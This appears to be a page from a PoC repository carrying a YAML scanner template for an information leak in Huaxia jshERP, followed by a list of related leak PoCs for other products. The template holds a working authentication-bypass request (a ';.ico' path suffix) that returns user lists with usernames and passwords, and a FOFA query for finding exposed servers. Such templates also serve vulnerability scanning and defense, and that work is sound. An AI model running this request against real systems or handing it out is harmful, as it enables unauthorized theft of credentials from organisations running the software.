huaxia-jsherp-info-leak: 华夏 ERP 信息泄露

漏洞描述

PoC代码[已公开]

id: huaxia-jsherp-info-leak

info:
  name: 华夏 ERP 信息泄露
  author: lei_sec
  severity: high
  verified: true
  description: |-
    fofa: body="jshERP"
  tags: huaxia,jsherp,info-leak
  created: 2025/08/20

rules:
  r0:
    request:
      method: GET
      path: /jshERP-boot/user/getAllList;.ico
    expression: response.status == 200 && response.body.bcontains(b'"code":') && response.body.bcontains(b'"data":') && response.body.bcontains(b'"userList":') && response.body.bcontains(b'"username":') && response.body.bcontains(b'"password":')
expression: r0()

相关漏洞推荐

• nsfocus-uts-password-leak: Nsfocus uts password leak
• firewall-password-leak: 防火墙硬编码漏洞
• svn-leak: SVM 代码托管泄漏
• POC aspcms-backend-leak: ASPCMS Backend Leak
• POC dlink-850l-password-leak: Dlink 850l Information Disclosure
• POC ecology-e-office-mysql-config-leak: 泛微OA E-Office mysql_config.ini 数据库信息泄漏
• POC hjtcloud-directory-file-leak: Hjtcloud Directory File Leak
• POC ruijie-eg-password-leak: Ruijie EG Information Disaclosure
• POC ruijie-nbr1300g-cli-password-leak: ruijie-nbr1300g-cli-password-leak
• POC seeyon-session-leak: Seeyon session leakage
• POC alibaba-canal-config-leak: Alibaba Canal config 云密钥信息泄露漏洞
• POC bohuawanglong-users-xml-password-leak: 博华网龙防火墙 users.xml 未授权访问
• POC csl-login-unauth-db-leak: CSL Login unauthorized DB Leak